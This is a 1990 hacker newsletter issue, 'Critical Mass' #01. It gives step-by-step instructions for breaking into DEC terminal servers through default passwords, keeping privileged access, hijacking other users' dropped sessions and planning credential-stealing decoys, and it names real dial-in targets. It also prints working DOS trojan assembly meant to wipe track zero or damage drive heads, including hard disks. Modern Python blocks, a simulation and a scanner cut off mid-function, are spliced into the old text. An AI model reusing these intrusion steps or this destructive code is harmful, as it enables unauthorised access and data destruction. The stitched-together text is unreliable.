_____________________________________________________________________________
                Critical Mass  -  A Technical Text File Newsletter
                Issue #01                                   (09/09/90)
_____________________________________________________________________________

Writers                     Special thanks to....
---------------------------------------------------------------------------
The Beaver                  The Baron (For info and a place for TLH area
BIOC AGENT                  hackers to call .................)
Mark Tabas                  Pink Floyd (Same as above....................)

                            Cool Breeze, The Highwayman, Rowag, and all
                            former members of Chaos Control, Copy Cat
                            (excluding Doug Ferrell), and Special Forces.
                            Also, Gator off of UF Ethernet, Mentilist,
                            The Nut-Kracker, the Sysop of the Hurrican
                            Hole, and the sysop of Warriers Retreat.
---------------------------------------------------------------------------
* Note: We, the writers and editors of this text newsletter, are not
responsible for any injuries or prosecutions due to the information given in
this text. EXPERIMENT AT YOUR OWN RISK!

Anybody who is willing can submit an article! If you wish to submit an
article, please e-mail either 'The Beaver' or the 'Nut-Kracker' via the
'Warriers Retreat' (904)422-3606. Also, all sysops can freely download this
text on the terms that it is not altered and none of the credits are changed.
So................. please act like a human!

Also, for your convenience, every now and then a 'volume' of the Critical
Mass is created. That is, after three to five issues (roughly 50k to 70k of
text) a compiled text will be made containing the past issues, so if you have
missed any issues, you can download the volume you need.

In order for this text to keep on being produced, you the reader need to
submit, be it by asking questions (which will sometimes be included in the
text) or by submitting an article. Any articles on Hacking, Fone Phreaking,
Credit Card Surfing, Pirating, Chemistry, etc. are welcome. Any generally
'not accepted' material is accepted here! Articles can be on anything from
'how to rip off this type of coke machine' to 'how to build an Axis bomb
from spare car parts'. We hope you enjoy the information given and find
some use for it.

Chief Editors                           Brought To You By Members of
~~~~~~~~~~~~~                           Critical Mass
The Beaver (SC/HA)
The Nut-Kracker (SC/HA)
______________________________________________________________________________
This issue contains articles of the following.....
______________________________________________________________________________
  I   - Editorial about Critical Mass, written by 'The Beaver'
  II  - Hacking DEC200 and Performance 4000 networks, written by 'The Beaver'
  III - Destructive Viruses, Trojans, etc. for your IBM PC!, by 'The Beaver'
  IV  - Basic Telecommunication, written by 'BIOC AGENT'
  V   - Better Homes and B-Boxing, written by Mark Tabas (c) C.C.C
  VI  - Virus Scare, written by 'The Beaver' for Online Magazine
  VII - Virus Stories, written by 'The Beaver' for Online Magazine
______________________________________________________________________________

____________________________________________________________________________
 I. Editorial: What is Critical Mass?
    Written By 'The Beaver'
____________________________________________________________________________

I have been involved with telecommunications via modem since the age of 13.
I'm now currently 18, and still telecommunicating strong. Over the years I
have seen many changes in telecommunications in my area. When I first
started using a modem, I quickly noticed the free exchange of information on
various bulletin boards in my town. People known as 'hackers', 'fone
phreaks', and 'pirates' constantly exchanged information. This is not the
case now. All the old boards have closed down, and the 'modem police' have
arrived, setting examples for other bulletin boards in our town, except for
an extreme few. Now it seems that every conversation on every board, except
for two that I can think of, is along the lines of 'Gee, hi Bob, how's the
wife and kids?'. I usually think to myself 'WHO THE HELL CARES?' and 'Gee,
it would be nice to know of several BBS's in my town where you could
communicate freely and not be kicked off.' I don't mean that on every BBS in
town you should be able to post up other people's credit card numbers, but
at least be a little open minded.
Well, before this starts to sound like the Nut-Kracker's NFSA text, I will
get to the point of why this text newsletter was created. I have lately, as
stated earlier, noticed a null in the conversations on the local area BBS's,
along with a null of communication between the hackers, pirates, fone
phreaks, etc. in our area. One reason, I feel, that there aren't that many
local area hackers left, along with pirates and fone phreaks (at least fone
phreaks have a reason for going a little bit under, that is because of AT&T
equipment replacing), is because the methods and traditions, along with
basic information, were never passed on. I mean, how many people out there
can honestly say that they could tell the difference between an ANI and a
customer loop in telephone terms? Can YOU set up a decoy to hack into a
system? How about a trojan horse? Can you write a virus, or have you even
seen one in action? Or maybe the question is, do you care? If you're a
human, odds are you do have at least a small bit of interest. This is how
technology increases. Can you honestly tell me that computer security
methods would not have tightened up if hackers, fone phreaks, virus
creators, and trojan horse creators had never existed? I'm not trying to
imply that it is 'ok' to create a virus, but do you really think that not
discussing the matter and not getting information is going to help? Of
course not. Any programmer who has the urge to destroy your system will do
so.

So basically, this text was written to get the young hacker/fone
phreak/pirate started. If you do not like it, so sue me. After all, it is
completely legal to write and discuss and, yes, give detailed information
out on these and other issues, so no, you're not a criminal for simply
downloading this text. That choice is made when you decide how you would
like to use the information given...... As for myself, I bet you can guess
how I use a lot of the information given.
At any rate, take it for what it's worth, and I hope you enjoy the text, and
the others to follow!!! Well, let's cut the editorial short and get some
information flowing.

______________________________________________________________________________
 II. Hacking DEC200 and Performance 4000 Network Servers
     Written By 'The Beaver'
     Part I
______________________________________________________________________________

After vigorous and intensive research by myself and The Nut-Kracker (members
of SC/HA - Sterling Cracking/Hacking Association), this article was written
and contains information never disclosed in other text files, newsletters,
etc., to the best of our knowledge. The DECserver 200 and Performance 4000
are popular networking equipment used by anything from corporations to
university systems. We did most of our 'research' illegally on the dozens of
Ethernet networks off of FIRN (Florida Information Resource Network
(904)488-0650 - (904)488-0657) and Tymnet. We have pretty much worn out our
welcome on FIRN, but if you care to, you can test some of the information
given in this article out on some of the DECserver 200s and Performance
4000s on FIRN. Who knows, you may strike it lucky!!

Basic commands for non-privileged access.

First off, on DECservers and Performance 4000s you are either a privileged
user or a non-privileged user. As a privileged user, you may use commands
that no normal user can use. As a privileged user, you can log out users,
set up services, initialize the system, change the server's characteristics,
and much, much more, but first you must know how to use some of the more
basic non-privileged commands and you must know some of the more basic
terms. The commands with the '*' beside them sometimes require that you are
privileged. This all depends on the server's characteristics. The short
hand for each command is written beside the command.
Commands                                  Terms
---------------                           ----------------------
*Show users         - sho u               Inactivity Timer
 Show ports         - sho por             Keepalive Timer
 Show ports (#)     - sho por (#)         Init Timer
 Broadcast port (#) - bro por (#)         Console port
*Show server        - sho serv
*Show nodes         - sho no
 Connect (name)     - c (service name)

Most of these commands explain themselves, but let's explain them anyway.........

Commands.
-----------------------------------------------------------------------------
Show Users     - Does exactly as it states: shows all the users and what
                 services they are connected to.

Show Port      - Shows all the characteristics of the port you are currently
                 connected to.

Show port (#)  - Shows the characteristics of a specific port other than your
                 own port. It can also be in the form of 'sho por all'. On a
                 DECserver 200 this will show all the ports' characteristics.
                 On a Performance 4000, it will show all the ports and their
                 current states, that is, whether they are 'connected', 'idle'
                 or in 'local' mode. To get this effect on a DECserver 200,
                 you type 'sho por all brief'.

Broadcast port (#) - This will send a message to a specific port. On
                 DECserver 200s, it poses a problem because you can interrupt
                 a command. So, when you're typing a command and someone
                 sends you a message, it interrupts the command and you have
                 to re-type it. On Performance 4000s, this does not happen.

Show Server    - Shows the server's characteristics. It shows the console
                 port, keepalive timer, inactivity timer, etc. of that server.

Show Nodes     - Shows services that are not currently up in the service
                 list. Any node that is not in the service list is not
                 reachable by non-privileged users.

Connect        - Self explanatory.

Terms
-------------------------------------------------------------------------------
Inactivity Timer - Logs ports out if no activities or connections are
                   created. It is usually set to 30 minutes. That's its
                   default.

Keepalive Timer  - Keeps a port active when an illegal logout has been done.
                   This is usually set to 30 minutes. This is also its
                   default.

Init Timer       - Shows when the next initialization of the server will
                   take place. When an initialization happens, everything is
                   back to its default and all counters are reset to zero.
                   (*Note: Sometimes you can type 'show counters' to see
                   their values.)

Console port     - The main port where privileged is usually set under. On
                   an initialization, all information of the server is
                   dumped to the console port.

If you would like to get more help on commands or would like to learn more
commands, type 'help' at the local prompt of any DEC made server.

Here are some more commands you need to know under a privileged port. The
non-privileged commands will still work on a privileged port. Here's the
list of what is covered.

Command list
------------------------------------------------------------------------------
Set server password (password)                  - set serve pass (0-32 chr$)
Set inactivity (enabled/disabled)               - set inact (e/d)
Set keepalive (enabled/disabled)                - set keep (e/d)
Set interrupt (enabled/disabled)                - set inter (e/d)
Logout port (#)                                 - lo por (#)
Set service (service name) (enabled/disabled)   - set servi (name) (e/d)
Zero (service name)                             - z (name)
Set node (node name) (enabled/disabled)         - (none)

Commands
------------------------------------------------------------------------------
Set server password - This is used to change the privileged password. If you
                 care to remain a network operator, then DON'T CHANGE IT!
                 There are usually no logs kept of people who have logged in,
                 so you can stay privileged for a LOOOOONNNNNGGGGGG time.

Set inactivity - This sets the inactivity timer. If a user is not doing
                 anything on a network, he will be logged out. By disabling
                 it, you will never be logged out for not doing anything.

Set keepalive  - This keeps 'alive' a port if it is logged out. Not to be
                 confused with the inactivity timer. This keeps a session
                 active after logoffs.
Set interrupt  - This makes it so that you can 'interrupt' sessions to
                 broadcast a message. You can set your own interrupts as a
                 non-privileged user, but you can't set other people's
                 interrupts. To set some other port besides your port, you
                 would type 'set inter por (#) enabled'.

Logout port (#) - With non-privileged access you just type 'lo' or 'logout',
                 but with privileged access you can log out other members on
                 the network. If you want to play with being a network
                 operator, then don't do this. I only did it when I was
                 busted by another user, and then I wouldn't let them back
                 on the network while I was on.

Set service    - This disables/enables services so other users can use them.
                 You can also disable services for specific ports like thus:
                 'set servi (service name) por (#) disabled'.

Zero (Name)    - This takes down services (fake or real, explained later on),
                 takes them off the service list and puts them in the node
                 list (if they're real services) where non-privileged users
                 cannot access them.

Set node       - This command sets up 'nodes' as 'services' so you can
                 access them. Sometimes in the node list there are nodes
                 nobody is allowed to have access to. This changes that. You
                 can also set up nodes so only certain ports can access them
                 by typing 'set node (node name) por (#) (enabled/disabled)'.
                 Actually there is probably a short hand way of doing this,
                 but I don't remember the format. It's probably something
                 like 'set no', or 'set nod'.

Ok, now that we have discussed some basic terms and operations (thanks to
all the people who know all this, and had to bear through it), now we can
talk about basic hacking information.

DECserver and 4000 Default password.

On most DECservers and 4000s, when the network is set up, the operator is
given a default password. That is, they are given a password that all DEC
servers and 4000s are given. It is the network operator that must change it,
but the majority leave it at the default.
Besides, 'who would want to hack a network server anyway?'. Actually, there
are many, many advantages in hacking network servers. I have only been on
two DECserver 200s that had already changed their default before I got
there. That's out of 14 servers. Hell, that's a 2:14 ratio! I got into a
company's network in Boston via Tymnet using a default!! The odds are that
the default hasn't been changed! My guess is that since the network doesn't
have to be accessed as an operator, and since the network pretty much runs
itself, nobody really notices what's going on on the net.

I advise that the first thing you do is 'define' the password. That is, when
you 'set' a function, it is only set till you log out, but if you 'define' a
function, it will change the next time the system is initialized. You see,
if you set the server's password, then it is set for that call, but as soon
as you disconnect it is changed back to its original value. If you define
it, it will change only when the server is initialized. So as soon as you
get on, set the inactivity to disabled, so you have as much time as you want
to play with the system, and type.......

    define serv password system

If you got the network operator's password by some other means, then replace
the word 'system' with the password you got in under. This command will
only work if you are already privileged, naturally. To become privileged
you type.....

    set privileged           (*Short hand: set priv)
    password:

(Use the default first, and you will probably have access as network
operator.) So........type......

    password:system

After this, define it as the password you got in on. The reason is that most
servers automatically initialize themselves, so if you get caught, in a
month or so, when the system is initialized, the password will change back
to the old password you got in under! Odds are that they won't notice for
months! Every time you get access on the system after you get kicked off,
repeat this process.
My guess would be that you can stay as a network operator for 6 months to a
year, getting caught or not!

Setting up loops

Loops can be used for a variety of reasons, be it security or for the
'falling in' method. Here is an example of a loop. We'll call the nets A, B,
and C. The first example will use only A and B. For this example we will say
that all these are DECserver 200s just to keep it simple. Let me note that
it doesn't have to be only a DEC200 that loops will work on. These have
been chosen to keep the example simple......Here's the first, starting at A.

    DEC 'A' ----------------------> DEC 'B' --+
       ^                                      |
       +--------------------------------------+
       |
       +------------------------------> To your desired service.

Here's the second.......

    DEC 'A' ----------------------> DEC 'B' --+
       ^                                      |
       +----------- DEC 'C' <-----------------+
       |
       +------------------------------> To your desired service.

If you are caught by a system operator under a loop, they will be led all
over the network (you can loop as many times as you like). The one problem
I found with loops was that there is a delay in transmission of data
because of all the networks it is being sent through. I usually don't worry
too much about loops, but it can be handy for falling in (mentioned later in
the text). Here are two examples of what loops would look like if you
started at A.........

    DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1
    Please type HELP if you need assistance
    Local>connect B
    Session established to B
    DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1
    Please type HELP if you need assistance
    Local>connect A
    Session established to A
    DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1
    Local>

(From here you're looped once; you can either do this process again or
continue from here.) Here's an example of the second example........
    DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1
    Please type HELP if you need assistance
    Local>connect B
    Session established to B
    DECserver 200 Terminal Server V2.0 (BL29) - LAT V5.1
    Please type HELP if you need assistance
    Local>connect C
    Etc., etc.

They may not look too different, but they are........ (Note: You do not have
to be privileged to perform a loop.)

Falling in Behind users.....

This method is good for getting a 'peek' at a system you need or want to get
into. If a witty programmer uses this method, he may be able to set up a
trojan horse, but the problem is that when you log out under an account that
you 'fall in' behind, you will more than likely never be able to get in on
that account ever again. Let me explain. On networks, when you log on from a
certain region, you will always get the same port, unless that port is
already taken, in which case you are re-routed to a port that is open. Above
I explained the operation of the keepalive timer; this is where we take
advantage of it. Let's say, in theory, you call (or are routed via another
network) to a DECserver (be it a DEC200 or 4000) just as somebody illegally
logs out, by, say, hanging up without typing 'logout' or whatnot. As they
log out, the keepalive timer keeps their session open and active. If by luck
you happen to get the port just as they log out (within the timer's limits),
you would fall into their session. That is, the keepalive timer keeps the
session they logged out under, and you go on right as they hang up, and
instead of getting the DECserver you get another prompt of the system that
was previously being used. Believe it or not, this can happen, both with
luck and skill. I have had this happen several times not knowing what
happened, but still the odds are against you. You will be happy to know that
with a little skill, patience and using loops, this can be done. The only
problem, as I stated before, is that when you log out, you lose that account.
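The keepalive behaviour described above is easiest to see in a small model. What follows is an added example, not from the newsletter and not DEC's code: a constructed Python simulation of a terminal server that hands a new caller the lowest port with no line up and keeps a session alive for the keepalive period after a line drop, beside the hardened policy of closing the session the moment the line drops. The class names, the 'VAX1' service and the caller names are assumptions.

```python
"""Toy model of terminal-server ports with a keepalive timer.

Added example (not the newsletter's or DEC's code). It models only the
behaviour the article describes: a dropped line leaves the session attached
to the port, and the next caller assigned that port inherits it.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

KEEPALIVE_MINUTES = 30   # the article's stated default for the keepalive timer


@dataclass
class Session:
    owner: str                          # who authenticated to the service
    service: str                        # "Local" = server prompt, else a host
    detached_at: Optional[int] = None   # minute the line dropped without 'logout'


@dataclass
class Port:
    number: int
    line_up: bool = False               # a caller is currently attached
    session: Optional[Session] = None


class TerminalServer:
    """One caller per port; a new caller gets the lowest port with no line up."""

    def __init__(self, n_ports: int, keepalive_minutes: int = KEEPALIVE_MINUTES,
                 close_on_disconnect: bool = False):
        self.ports = [Port(i + 1) for i in range(n_ports)]
        self.keepalive = keepalive_minutes
        # hardened policy (assumed name): tear the session down on line drop
        self.close_on_disconnect = close_on_disconnect
        self.clock = 0
        self.events: List[str] = []     # what a defender could log and alert on

    def tick(self, minutes: int) -> None:
        """Advance the clock and expire kept-alive sessions past the timer."""
        self.clock += minutes
        for p in self.ports:
            s = p.session
            if s and s.detached_at is not None and \
               self.clock - s.detached_at >= self.keepalive:
                self.events.append(f"t={self.clock}: keepalive expired on port "
                                   f"{p.number}, session of {s.owner} closed")
                p.session = None

    def dial_in(self, caller: str) -> Tuple[int, str, str]:
        """Attach a caller; returns (port, service seen, owner of that session)."""
        for p in self.ports:
            if p.line_up:
                continue
            p.line_up = True
            if p.session is not None:
                # The article's 'falling in': the port still holds a kept-alive
                # session, so the caller lands at that host's prompt, not Local>.
                self.events.append(f"t={self.clock}: {caller} attached to port "
                                   f"{p.number} and inherited {p.session.owner}'s "
                                   f"session to {p.session.service}")
                return p.number, p.session.service, p.session.owner
            p.session = Session(owner=caller, service="Local")
            return p.number, "Local", caller
        raise RuntimeError("no free port")

    def connect(self, port: int, service: str) -> None:
        self.ports[port - 1].session.service = service

    def hang_up(self, port: int) -> None:
        """Line drop without typing 'logout' (the article's 'illegal logout')."""
        p = self.ports[port - 1]
        p.line_up = False
        if self.close_on_disconnect or p.session is None:
            p.session = None
        else:
            p.session.detached_at = self.clock   # keepalive timer starts

    def logout(self, port: int) -> None:
        p = self.ports[port - 1]
        p.line_up = False
        p.session = None


def second_caller_sees(close_on_disconnect: bool, gap_minutes: int) -> Tuple[int, str, str]:
    """Alice connects to a host, hangs up without logout; Bob dials in later."""
    srv = TerminalServer(n_ports=4, close_on_disconnect=close_on_disconnect)
    port, _, _ = srv.dial_in("alice")
    srv.connect(port, "VAX1")            # constructed service name
    srv.tick(10)
    srv.hang_up(port)
    srv.tick(gap_minutes)
    return srv.dial_in("bob")


if __name__ == "__main__":
    print("default keepalive, 5 min later  :", second_caller_sees(False, 5))
    print("default keepalive, 30 min later :", second_caller_sees(False, 30))
    print("close on disconnect, 5 min later:", second_caller_sees(True, 5))
```

The events list is the defender's handle on this: a caller attaching to a port that still holds another user's session is the thing to log and alert on, and closing sessions on carrier loss (or a keepalive far shorter than 30 minutes) removes the window altogether.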
One time I used this method and found myself on a VAX under VMS. I was under
someone's account using someone's password. The easy part is finding the
username you're under, but you still don't have the password! So, I'm
sitting in this system and I think 'hey, no big deal, I will change the
password so that I can use it for several days'. What I had forgotten was
that it asks for the old password in order to change it to a new one. It
does get frustrating to be sitting inside of a system and know the second
you disconnect, it's gone, but you can gain a lot still. If you try to
change the password, you're back to password hacking again.

Let me attempt to explain what happens and how to use this method. In order
to understand, you must understand loops.......The example networks I will
use are A and B; we will make them both DEC Performance 4000s in this case.
(*Note: it is not always necessary for them to be DEC servers.) We will
start at network A first. This method is easier if you are accessed as a
privileged user. If you are privileged, the first thing you want to do is
set your inactivity to disabled so you have plenty of time. If you aren't,
then don't worry about this. Now you need to show your port (sho por) to see
what port you're in; after this, write down what the results were. Now we
start the loop. Now we would connect to B. When we got onto B we would show
the port again and write down the results again. Next we would connect back
to A again (we will be under a different port) and show the port again and
write down the results. From here we would log out of A and now be put on B.
It would be extremely helpful to set your inactivity to disabled here also.
Now re-connect to A again, and write down the port you're in. You should be
on the same port you logged into the first time unless someone has logged
onto the port before you. That's why I suggest you do this late at night
when nobody is on yet. Now we know what port you always get logged into from
B to A.
Now you wait till someone logs onto the port you always get on when you log
in from B to A. To do this, log back onto A every once in a while and check
your port. If you get logged onto a different port, show the users and see
who is on your port, and what they are connected to. Now we wait even more
and do some praying in between. We pray that the user will illegally log
out. This is common, because normal users find it a hassle to type in
'logout', so usually they will simply hang up. When someone does finally log
onto the port you always get, we wait and simply log onto A from B and see
if we're in. If we are not, then we show the users to make sure the user
hasn't properly logged out. Here's what happens graphically..........

    User --------> DEC A (port N) --------> To Session
    Us   --------> DEC A ---------> DEC B --+
                     ^                      |
                     +-- (some other port) -+

In this case it didn't work.... Here's when it does work.......

    User ---+
            +--> DEC A (port N) ----------> To Session
            ^
    Us   ---> DEC A ---------> DEC B -------+  (back onto DEC A, port N,
                                               right after the user hangs up)

Confusing, huh? If this didn't cover it to where you can understand, e-mail
me and I will gladly answer any questions...........

A Trap Door......

On a DEC server, The Nut-Kracker and I hit on a trap door (also called a
back door). Actually, it is an error in the DECserver software. I'm not sure
if it works on Performance 4000s, but on some DECservers that are working on
a VAX that also runs other operations, it does seem to work. What happened
was that I was on a DEC200 and I wasn't too worried about losing privileged
access. So I set myself up as a network operator and began re-initializing
the system. I noticed that there was a console port, so I began to get help
on setting up ports as consoles. It told me that if I were a true console it
would give me a downline dump of all data on the server. Well, naturally I
was interested in this dump, just to see what it would give me.
So I set my port up as a console (set console port (#) enabled) and
proceeded to initialize the system. It didn't send me a downline dump but
instead booted me off! I tried to reconnect several times, but it wouldn't
let me do so until about two minutes later, but instead of getting a local
prompt I got a '$' prompt, which told me I was probably in someone's VMS on
a VAX. I had fairly good access but under no username that I could find, so
therefore I did not exist! I logged out and tried this process again and it
did the same thing. Here's my theory of what happened. I was on Fla.
Atlantic Univ. at the time, and I had noticed that in the services a system
called 'KOALA' was available. Evidently the network I was operating off of
was also run on that VAX, but it was also being used for other things as
well. When I re-inited the system, instead of putting me back on the
network, it threw me into the VAX! I can't promise that this will work on
all DEC200s, because it depends on what it is running on, I imagine. One
problem I saw was that when you re-init the network, the staff the next
morning will notice. So there is a sacrifice, but from what I saw, I was a
VERY high level user on that VAX. So it may be worth the risk. Often I
notice that if you initialize a network once, the network staff will think
nothing of it, but if you keep on doing it they will.

Setting up decoys.

I cannot be sure of this, but it MAY be possible to set up a decoy via
DECservers. A decoy operates like this: you make a user think he is calling
something he is not, and give the user a password prompt and a username
prompt. When the user types it in, it is sent to you. Usually you say
something like 'Password invalid' every time he tries it, then on the third
you kick him off your decoy and set up the real service. I'm not sure if it
can be done, but I have a feeling it can. I was attempting to set up a decoy
on a company's system in Boston via Tymnet when they caught me and booted me
off.
Evidently, they thought I was such a major threat that they changed the
network name (I accessed it through Tymnet 904-878-2267 in the Tallahassee
region) so that it would make it tons harder to access it again. I got to
the point where I could set up services that didn't exist and make them
look like they were 'available'. I could even set up services that were not
even on the node name list! I set up a service as 'Beaver', stated that it
was 'Available' and gave it an identifier of 'this is a test'. After this I
spent an hour trying to get it down before the morning came around and
people started to show up for work! I did finally get it down though. Here
was my original plan. I was going to take down a service and put it in the
nodes list. After this, I was going to create a fake service under the same
name. When someone 'connected', or at least thought they had, it would send
me the username and password. I may have been able to do this through the
'announcement' command, but I'm not sure. As I said, I never got past the
setting up false services stage, but you may get more lucky than I was. You
can only do this through privileged access though. If anyone does ever set
up an actual decoy, PLEASE notify me. If you ever get the chance, see if it
can be done. There are BIG, BIG uses of decoys! If you do get the chance,
get some help on 'zero', 'set services', 'set nodes'. If you need any
assistance, contact a member of the SC/HA.

If you care to play with any (Digital Equipment Corp.) DEC Ethernets, here
are a couple of places you can go VIA FIRN (Florida Information Resource
Network). All the ones given have THE most slack security I have ever seen
in my life. Odds are, you will run into me, or the Nut-Kracker. There are
many other Florida area hackers running around on this net. The first time I
logged onto FIRN I thought it was the lamest net I had ever gotten on, but
actually it is a fun place to play. Through FIRN you can access BITNET, DOE
(Dept. of Education), just about all major universities of Florida and some
not so major, all sorts of networks, FSU Cybers, in-out modems, and MUCH,
MUCH more. Please, if you go on, set your interrupt to disabled, except for
the ones where the '*' is, where it really doesn't matter. If you see me,
send me a message! (bro por # 'msg. here')

    Straight through FIRN (904)488-0650 through (904)488-0657
    * SERDC Ethernet

    Through Univ. Fla Ethernet (UF):
       Call 200   (DEC200)
       Call 250   (DEC200) sometimes not up.
       Call 201   (Perfor. 4000)
       Call 202   (Perfor. 4000)
      *Call 1000  (Select 'VAX') (DEC200)
      *Call 3000  (DEC200)

_____________________________________________________________________
 III. Destructive Programs for your IBM PC.
      Written by 'The Beaver'
_____________________________________________________________________

This article is the first part of a series, hopefully. We will deal with
destructive programs for your IBM PC computer. Actually, the title of this
article is a little inaccurate, because of the fact that I intend on adding
in some code for those Commodore 64/128 users out there also. But first, we
will go right into IBM programs to start off with. First off, you are going
to have to know a few things. A destructive program can be written in about
any language. We will be dealing in everything from BASIC programming to
Assembly. All the code in Assembly can be entered through a program that all
PC users get when they get MSDOS for their computer. That program is
'DEBUG'.

How To Use Debug As An Assembler.
--------------------------------

All of you that are experienced in assembling with Debug are just going to
have to bear through this. Sorry. To start out, what you are going to need
is a processor that can save in pure ASCII form. This can be a word
processor or Edlin. If you are not used to using Edlin, simply refer to your
MSDOS user manual. It's not that hard to understand. Anything that can save
in pure ASCII form will do just fine.
We are going to be making files with a '.COM' extension, but first let's get
a little bit of understanding of the registers. The microprocessor in your
IBM has several bytes of its own memory, divided into 14 areas called
registers. The computer uses these registers to keep track of what is going
on. The only really important register, in our case, is the one that keeps
track of the number of bytes being written. To display the registers, you
type 'r':

    -r

Debug will respond with the names and contents of these registers, like
thus......

    AX=xxxx  BX=xxxx  CX=0000  DX=xxxx  SP=xxxx  BP=xxxx  SI=xxxx  DI=xxxx
    DS=xxxx  ES=xxxx  SS=xxxx  CS=xxxx  IP=xxxx   NV UP EI PL NZ PO NC
    xxxx:0100 xx        xxxx

Luckily, not all these registers need to be explained. The only important
register is the one with the '0000' after it, or CX. This controls how many
bytes are to be written. To change a register we would type....

    r (name of the register)

Or, in our case, to change the number of bytes to write, you would type

    r cx

It would respond with something like

    CX 003E
    :

At the ':' you would type the number of bytes to write, in hexadecimal. If
you do not know HEX, then look it up in a computer book of some kind. This
is also not hard information to find.

Now, I know you may be saying 'what the hell are you talking about?', but
don't fret, it will become more clear. From here, I will just use
examples...... Let's say you have the following Assembly code. We will say
this is the code:

    mov ah,1
    mov cx,10c
    int 10
    int 20

We would break out a word processor and type the following:

    a 100          ( Tells Debug to assemble )
    mov ah,1
    mov cx,10c
    int 10
    int 20
                   ( You MUST have a blank line here, in order for it to work )
    r cx           ( A debug command, as I mentioned above )
    9              ( We will be writing 9 bytes; this is the new value of CX )
    n first.com    ( This tells debug what to name the file )
    w              ( Write the debug file )
    q              ( Quit debug )

Now remember, this is all entered through a word processor. Don't try to
type this in Debug.
Now we will save the completed text file as 'first.scr'. OK, now copy Debug to the disk with the text file above on it. Next you would type the following (the '<' feeds the script file to Debug):

debug < first.scr

All this should happen automatically. You type nothing. I know these are all pretty sketchy details, but I do not wish to make this into a 'how to use Debug' text file. If you have any problems, e-mail me or get a copy of Supercharged MSDOS by Van Wolverton, printed by Microsoft Press. If you did get the thing to work and understand it somewhat, the cursor after you ran this .COM file should have gotten bigger. If it didn't, then either you don't understand it as well as you think, or you typed it in wrong.

How To Destroy Disk Drives
--------------------------

OK, enough dilly-dallying; on with the article. The following has been set up for YOU, the user, to experiment with. I will explain as I go along. I also intend to explain what to look for if you think a program is a destructive one. OK, this assembly code:

mov ah,05
mov dl,00
mov dh,00
mov ch,00
mov cl,01
mov al,08
int 13
mov ah,00
int 21

Now let me explain this code some. This is a trojan horse. Actually it doesn't destroy the disk drive in a physical manner, but it destroys track zero of the disk, thus making it unusable by DOS. While you can still use a floppy after it has formatted your software, this is NOT true for a hard drive. If you notice the line that states 'mov dl,00', this sets the drive to drive A. If this is changed, you risk your hard drive. The only thing you destroy when DL is left at 00 is the disk in drive A, but if you change the number to the hard drive, it WILL DESTROY YOUR HARD DRIVE, MAKING IT UNUSABLE, and you will have to get it reformatted by the manufacturer. Let's now examine the code.

Loading AH with a five means format track:

mov ah,05

DL contains the drive number. In this case it is drive A (0=A):

mov dl,00

DH contains the head number. This is zero:

mov dh,00

CH is the track number.
As I said earlier, this is zero:

mov ch,00

CL contains the sector number. Here it is sector one:

mov cl,01

AL contains the number of sectors to be processed. There are eight sectors to one track, so we say:

mov al,08

This is an interrupt 13h. This is the BIOS interrupt for disk access:

int 13

And the program is ended with an interrupt 21h:

mov ah,00
int 21

So what this small assembly code does is simply wipe out track zero, thus making the disk unusable by DOS. As I said before, don't attempt this on your hard drive unless you don't like it.

Now, building on the code above, we can also accomplish another thing. The code up top simply moves the heads to track zero and wipes out all eight sectors. It basically reformats the first track (track zero). The next bit of code doesn't do this, but rather moves the heads of the drive past the innermost track. This is done because on some disk drives the heads will seize up, and the drive must be taken apart to get to them and free them. This only works on some drives, though. This is done by telling the computer to move the heads past track 39. The code looks like this:

mov ah,05
mov dl,00
mov dh,00
mov ch,80
mov cl,01
mov al,08
int 13
mov ah,00
int 21

Remember that 'ch' tells the computer what track to go to. Note its value (80 hex, well past track 39).

It is also possible to destroy monitors by reprogramming the 6845 CRT controller, from what I understand, but I have not yet obtained the code or tried to figure it out. I like my monitor too much, I guess.

At any rate, all the code given here is set for drive A. If you still remember, 'DL' contains the drive you wish to use, and '00' is for drive A. Here are the rest for you to use at your disposal:

00 - A
01 - B
02 - C

You could have probably guessed that, huh?

False errors.
-------------

OK, all the stuff covered so far is good trojan horse material, but let's go into logic bombs for a moment. I'm going to take it that we are all used to hearing this term and move on.
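Before the logic bombs, a word on the other side of this. The article promises to show what to look for if you think a program is a destructive one, and the simplest form of that is a static sweep of a .COM file for the register/interrupt pairs the listings above use. The Python below is an added example, not code from the article or from Critical Mass. It hand-assembles the article's own listings into constructed .COM images (which also shows why the first.com script needed 'r cx' set to 9) and then flags INT 13h calls with AH=05h (format track), INT 13h calls whose CH is beyond track 39 (the head-seizing variant), and INT 21h calls with AH=25h, the interrupt-vector hook used by the false-error and keyboard-lock listings further down. The decoder covers only the immediate-move and INT forms these listings use and skips every other byte one at a time; that is an assumption that holds for these small images, not for arbitrary code.

```python
"""Static triage of small DOS .COM images for the patterns in this article (added example)."""
from dataclasses import dataclass
from typing import Dict, List

# 8086 register order for the B0+r (8-bit) and B8+r (16-bit) immediate-move opcodes
R8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
R16 = ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]
DRIVES = {0: "A", 1: "B", 2: "C"}        # DL values as given in the article
LAST_FLOPPY_TRACK = 39                   # the article's limit for a 40-track drive

# Constructed sample images, hand-assembled from the listings in this article.
BIG_CURSOR = bytes.fromhex("B401 B90C01 CD10 CD20")            # mov ah,1 / mov cx,10c / int 10 / int 20
FORMAT_TRACK0 = bytes.fromhex("B405 B200 B600 B500 B101 B008 CD13 B400 CD21")
SEIZE_HEADS = bytes.fromhex("B405 B200 B600 B580 B101 B008 CD13 B400 CD21")   # mov ch,80
HOOK_KEYBOARD = bytes.fromhex("B435 B004 CD21 8CC0 8BD3 8ED8 B425 B009 CD21 B80000 CD21")


@dataclass
class Finding:
    offset: int      # byte offset of the INT instruction inside the image
    what: str


def scan_com(code: bytes) -> List[Finding]:
    """Linear sweep that tracks the last immediate loaded into each 8-bit register.

    Only `mov r8,imm8`, `mov r16,imm16` and `int imm8` are decoded; any other byte
    is skipped singly. That is enough for the article's listings (assumption).
    """
    regs: Dict[str, int] = {}
    findings: List[Finding] = []
    i = 0
    while i < len(code):
        op = code[i]
        if 0xB0 <= op <= 0xB7 and i + 1 < len(code):            # mov r8, imm8
            regs[R8[op - 0xB0]] = code[i + 1]
            i += 2
        elif 0xB8 <= op <= 0xBF and i + 2 < len(code):          # mov r16, imm16 (little-endian)
            r = R16[op - 0xB8]
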